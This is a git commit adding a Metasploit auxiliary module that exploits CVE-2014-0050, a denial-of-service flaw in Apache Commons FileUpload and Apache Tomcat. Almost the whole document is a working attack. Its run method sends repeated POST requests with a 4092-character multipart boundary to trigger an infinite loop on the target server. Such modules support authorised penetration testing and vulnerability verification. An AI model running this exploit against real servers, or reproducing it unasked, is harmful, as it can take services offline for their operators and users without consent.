Add module for CVE-2014-0050

2014-02-22 14:56:59 +01:00 · 2014-02-22 14:56:59 +01:00 · 8f7f1d0497
parent 998fa06912
commit 8f7f1d0497
1 changed files with 76 additions and 0 deletions
--- a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
+++ b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
@ -0,0 +1,76 @@
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class Metasploit4 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos
  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Apache Commons FileUpload and Apache Tomcat DoS',
      'Description'     => %q{
          This module triggers an inifinite loop in Apache Commons FileUpload 1.0 through 1.3
        via a Content-Type header.
        Apache Tomcat 7 and Apache Tomcat 8 use a copy of Apache Commons FileUpload
        to handle mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
        and 8.0.0-RC1 through 8.0.1 are affected by this issue.
        Tomcat 6 also uses Commons FileUpload as part of the Manager application.
       },
       'Author'         =>
         [
           'This issue was reported to the Apache Software Foundation and accidently made public.', # advisory
           'ribeirux' # metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
           ['CVE', '2014-0050'],
           ['URL', 'http://markmail.org/message/kpfl7ax4el2owb3o'],
           ['URL', 'http://tomcat.apache.org/security-8.html'],
           ['URL', 'http://tomcat.apache.org/security-7.html'],
         ],
        'DisclosureDate' => 'Feb 6 2014'
      ))
      register_options(
        [
          Opt::RPORT(8080),
          OptString.new('URI', [ true,  "The request URI", '/']),
          OptInt.new('RLIMIT', [ true,  "Number of requests to send",50])
        ], self.class)
  end
  def run
    boundary = "0"*4092
    opts = {
      'method'         => "POST",
      'uri'            => normalize_uri(datastore['URI']),
      'ctype'          => "multipart/form-data; boundary=#{boundary}",
      'data'           => "#{boundary}00000",
      'headers' => {
        'Accept' => '*/*'
      }
    }
    for x in 1..datastore['RLIMIT']
      print_status("Sending request #{x} to #{rhost}:#{rport}")
      begin
        c = connect
        r = c.request_cgi(opts)
        c.send_request(r)
        # Don't wait for a response
      rescue ::Rex::ConnectionError => exception
        print_error("#{rhost}:#{rport} - Unable to connect: '#{exception.message}'")
        return
      ensure
        disconnect(c) if c
      end
    end
  end
 end